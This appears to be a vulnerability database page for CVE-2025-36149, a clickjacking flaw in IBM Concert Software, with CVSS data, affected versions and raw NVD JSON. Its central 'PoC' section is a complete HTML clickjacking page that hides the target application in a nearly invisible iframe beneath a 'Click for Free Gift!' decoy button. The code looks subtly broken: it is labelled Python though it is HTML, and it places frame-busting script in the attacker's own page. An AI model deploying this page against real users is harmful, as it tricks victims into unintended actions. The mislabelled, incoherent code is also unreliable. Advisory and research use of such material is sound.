Security Vulnerability Report
中文
CVE-2025-36149 CVSS 6.3 MEDIUM

CVE-2025-36149

Published: 2025-11-21 20:15:48
Last Modified: 2025-12-02 16:22:26
Source: [email protected]

Description

IBM Concert Software 1.0.0 through 2.0.0 could allow a remote attacker to hijack the clicking action of the victim.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:* - VULNERABLE
IBM Concert Software 1.0.0
IBM Concert Software 1.x
IBM Concert Software 2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Clickjacking PoC for CVE-2025-36149 --> <!-- IBM Concert Software 1.0.0 - 2.0.0 --> <!DOCTYPE html> <html> <head> <title>Clickjacking PoC - CVE-2025-36149</title> <style> body { margin: 0; padding: 20px; font-family: Arial, sans-serif; background: #f0f0f0; } .container { position: relative; width: 100%; max-width: 800px; margin: 0 auto; } h1 { color: #333; text-align: center; } .description { background: #fff; padding: 15px; border-radius: 5px; margin-bottom: 20px; box-shadow: 0 2px 5px rgba(0,0,0,0.1); } /* Invisible iframe containing target application */ .iframe-wrapper { position: relative; width: 100%; height: 600px; border: 2px solid #333; background: #fff; } iframe.target { position: absolute; top: 0; left: 0; width: 100%; height: 100%; opacity: 0.01; /* Nearly invisible */ filter: alpha(opacity=1); /* IE support */ z-index: 1; } /* Decoy button positioned over iframe */ .decoy-button { position: absolute; top: 250px; left: 50%; transform: translateX(-50%); padding: 15px 40px; font-size: 18px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; border: none; border-radius: 8px; cursor: pointer; z-index: 2; box-shadow: 0 4px 15px rgba(102, 126, 234, 0.4); } .decoy-button:hover { transform: translateX(-50%) scale(1.05); } .warning { background: #fff3cd; border: 1px solid #ffc107; color: #856404; padding: 10px; border-radius: 5px; margin-top: 20px; text-align: center; } </style> </head> <body> <div class="container"> <h1>CVE-2025-36149 PoC</h1> <div class="description"> <p><strong>Vulnerability:</strong> Clickjacking in IBM Concert Software 1.0.0 - 2.0.0</p> <p><strong>Description:</strong> This PoC demonstrates how an attacker can overlay a decoy button over an invisible iframe containing IBM Concert Software. When users click the visible button, they actually click on hidden elements within the target application.</p> </div> <div class="iframe-wrapper"> <!-- Target: IBM Concert Software --> <iframe class="target" src="https://[IBM_CONCERT_HOST]/ibm/concert" sandbox="allow-same-origin allow-scripts allow-forms allow-popups"> </iframe> <!-- Decoy: Fake button that user sees --> <button class="decoy-button">Click for Free Gift!</button> </div> <div class="warning"> ⚠️ This is a security research PoC for educational purposes only. </div> </div> <script> // Frame busting script (for demonstration) if (top.location !== self.location) { top.location = self.location; } // Detect if page is being framed try { if (window != window.top) { console.log('Page is being framed - potential clickjacking attempt'); } } catch (e) { console.log('Cross-origin frame detected'); } </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36149", "sourceIdentifier": "[email protected]", "published": "2025-11-21T20:15:48.017", "lastModified": "2025-12-02T16:22:26.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Concert Software 1.0.0 through 2.0.0 could allow a remote attacker to hijack the clicking action of the victim."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "2.1.0", "matchCriteriaId": "43072AC2-05A5-41A3-9E79-E0AF2C5AD3FF"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7252019", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.